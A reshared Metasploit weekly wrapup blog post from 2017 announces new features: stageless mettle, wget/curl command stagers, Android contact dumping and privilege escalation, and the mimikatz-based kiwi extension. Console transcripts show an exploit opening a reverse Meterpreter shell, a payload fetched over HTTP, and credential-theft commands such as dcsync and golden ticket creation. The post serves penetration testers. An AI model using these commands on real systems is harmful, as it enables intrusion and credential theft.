Wednesday, February 1, 2017

Weekly Metasploit Wrapup [feedly]



----
Weekly Metasploit Wrapup
// Metasploit

Welcome back to the Metasploit Weekly Wrapup! It's been a while since the last one, so quite a bit has happened in that time including 75 Pull Requests.

 

Stageless mettle

The rewrite of meterpreter for POSIX systems, mettle, now supports a stageless mode. You can now build standalone static executables for almost a dozen architectures and run them on everything from small home routers to cell phones to servers and mainframes. It can also take its configuration from the command line, so you don't even need a different executable for different handler locations.

 

UDP pivoting

The new mettle supports pivoting just like Windows meterpreter, and both have had some improvements for forwarding UDP packets in this update. This is particularly useful with auxiliary/scanner/discovery/udp_sweep, which tries a bunch of different protocol probes on a range of ports to quickly identify UDP services.

 

Android

Using APK injection to trojan an existing Android app is a cool trick for social engineering folks into installing your backdoor, and it can get you a lot of info from a phone. One downside is that Android's privilege seperation system prevents you from reading the data owned by other apps, so there are some things you might want to steal that you won't have access to. That's where Local Privilege Escalation exploits become essential. This week's update includes a new LPE for a relatively old vulnerability, the put_user bug which was exploited in the wild in 2013, as well as updates to the towelroot exploit allowing it to target more devices.

 

This week's update adds CSV and vCard output formats to Android Meterpreter's dump_contacts command. This means you can now dump an Android device's contact list in an importable format.

 

Ever find yourself in a situation where you can't back up your phone contacts normally? Meterpreter to the rescue! If you can shell your phone - which you should be able to if it's yours - the `dump_contacts` command now gives you the option of a normal text file, CSV, or vCard for the output format.

 

Here's how to use it:

 

meterpreter > dump_contacts -h  Usage: dump_contacts [options]  Get contacts list.    OPTIONS:        -f   Output format for contacts list (text, csv, vcard)      -h        Help Banner      -o   Output path for contacts list      meterpreter > dump_contacts -f csv  [*] Fetching 4 contacts into list  [*] Contacts list saved to: contacts_dump_20170121174248.csv  meterpreter > dump_contacts -f vcard  [*] Fetching 4 contacts into list  [*] Contacts list saved to: contacts_dump_20170121174258.vcf

 

 

wget/curl command stagers

 

 

If you're familiar with command injections, you know that downloading a payload from a remote host and then executing it can be more efficient than writing the payload to the target incrementally.

 

This update brings wget(1) and curl(1) command stagers (CmdStager) to Metasploit in environments that need it most (read: embedded). With the option of HTTP or HTTPS, a small embedded device can now fetch payloads over either protocol.

 

To use the new command stagers in your module, you can set flavor: wget or flavor: curl in your execute_cmdstager call, or you can set the flavor in CmdStagerFlavor in your info hash. Lastly, if you're already running the module, you can change the flavor with CMDSTAGER::FLAVOR, but that'll work only if the module doesn't define a required flavor.

 

Here's an example of setting CMDSTAGER::FLAVOR:

 

msf > use exploit/linux/http/apache_continuum_cmd_exec   msf exploit(apache_continuum_cmd_exec) > set rhost 192.168.33.129  rhost => 192.168.33.129  msf exploit(apache_continuum_cmd_exec) > set payload  linux/x64/mettle_reverse_tcp   payload => linux/x64/mettle_reverse_tcp  msf exploit(apache_continuum_cmd_exec) > set cmdstager::flavor wget   cmdstager::flavor => wget  msf exploit(apache_continuum_cmd_exec) > set lhost 192.168.33.1   lhost => 192.168.33.1  msf exploit(apache_continuum_cmd_exec) > run    [*] Started reverse TCP handler on 192.168.33.1:4444   [*] Injecting CmdStager payload...  [*] Using URL: http://0.0.0.0:8080/XlM6PUw74P  [*] Local IP: http://192.168.1.3:8080/XlM6PUw74P  [*] Meterpreter session 1 opened (192.168.33.1:4444 ->  192.168.33.129:55171) at 2017-01-27 13:27:54 -0600  [*] Command Stager progress - 100.00% done (114/114 bytes)  [*] Server stopped.  meterpreter > 

 

Notice how small the command stager is. If we were to write the payload out with echo(1) or printf(1) or somesuch, we'd be sending the payload as hex strings... which will take a while to write to disk.

 

 

History command

Metasploit stores your msfconsole history in ~/.msf4/history but sometimes you only want dump out pieces of it. The new history command works similarly to the bash command of the same name letting you do just that.

 

workspace -v

The workspace command now takes a verbose flag to dump out some statistics about the stuff you've collected in each workspace. It shows the number of hosts, vulns, creds, loots, and notes.

 

11:52:25 192.168.99.1 nasa j:0 s:0 exploit(psexec) > workspace     default     fbi    * nasa     wh.gov  11:52:45 192.168.99.1 nasa j:0 s:0 exploit(psexec) > workspace  -v    Workspaces    ==========    current  name     hosts  services  vulns  creds  loots  notes    -------  ----     -----  --------  -----  -----  -----  -----             default  5      2         3      3      0      8             fbi      98     165       49     155    301    72    *        nasa     32     81        41     14     33     20             wh.gov   1      9         0      0      0      0    11:52:45 192.168.99.1 nasa j:0 s:0 exploit(psexec) >  

 

 

to_handler command

Complementing the handler command is another new command, to_handler, that does the same thing, but takes its settings from the context of the currently-selected payload module. At some point it is likely that these two things will be unified, but for now it's pretty useful as is.

 

12:07:10 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > options    Module options (payload/windows/meterpreter/reverse_https):       Name      Current Setting  Required  Description      ----      ---------------  --------  -----------      EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)      LHOST                      yes       The local listener hostname      LPORT     8443             yes       The local listener port      LURI                       no        The HTTP Path  12:07:11 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > set LHOST 192.168.99.1  LHOST => 192.168.99.1  12:07:27 192.168.99.1 nasa j:0 s:0 payload(reverse_https) >   12:07:29 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > set LPORT 8888  LPORT => 8888  12:07:39 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > to_handler  [*] Payload Handler Started as Job 2  [*] Started HTTPS reverse handler on https://0.0.0.0:8888  [*] Starting the payload handler...  12:07:41 192.168.99.1 nasa j:1 s:0 payload(reverse_https) > jobs -v    Jobs    ====     Id  Name                    Payload                            Payload opts               URIPATH  Start Time                 Handler opts     --  ----                    -------                            ------------               -------  ----------                 ------------     2   Exploit: multi/handler  windows/meterpreter/reverse_https  https://192.168.99.1:8888           2017-01-27 12:07:40 -0600  https://0.0.0.0:8888  

 

Revamped kiwi

Meterpreter now has a revamped kiwi extension, replacing the old system of specific TLVs with a much simpler interface to the mimikatz command system. What that means for developers is a lot fewer moving parts between the two codebases and easier, streamlined updates. What that means for users is getting the latest and greatest mimikatz in Meterpreter a lot sooner.

 

This brings kiwi up to mimikatz version 2.1, and now works on Windows XP SP3 and Windows 2003 SP1 all the way up to 10 and 2016. In particular the new dcsync command is fabulous for stealing hashes from a domain controller. This grabs info from the DC's user database so, just like when parsing NTDS.dit, it gets historical hashes as well as the one currently in use for the given user.

 

As before, the kiwi client extension has commands for most of the things you want to get out of mimikatz:

Kiwi Commands  =============        Command                Description      -------                -----------        creds_all              Retrieve all credentials (parsed)      creds_kerberos         Retrieve Kerberos creds (parsed)      creds_msv              Retrieve LM/NTLM creds (parsed)      creds_ssp              Retrieve SSP creds      creds_tspkg            Retrieve TsPkg creds (parsed)      creds_wdigest          Retrieve WDigest creds (parsed)      dcsync                 Retrieve user account information via DCSync (unparsed)      dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync      golden_ticket_create   Create a golden kerberos ticket      kerberos_ticket_list   List all kerberos tickets (unparsed)      kerberos_ticket_purge  Purge any in-use kerberos tickets      kerberos_ticket_use    Use a kerberos ticket      kiwi_cmd               Execute an arbitary mimikatz command (unparsed)      lsa_dump_sam           Dump LSA SAM (unparsed)      lsa_dump_secrets       Dump LSA secrets (unparsed)      wifi_list              List wifi profiles/creds

 

If that doesn't cover what you need, you can also send commands directly to the underlying mimikatz shell, so you can access everything that we don't have a direct wrapper for.

 

And then you run the most important command that mimikatz offers:

meterpreter > kiwi_cmd coffee        ( (       ) )    .______.    |      |]    \      /     `----'

New Modules

Exploit modules (6 new)

Auxiliary and post modules (4 new)

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:


----

Shared via my feedly newsfeed


Sent from my iPhone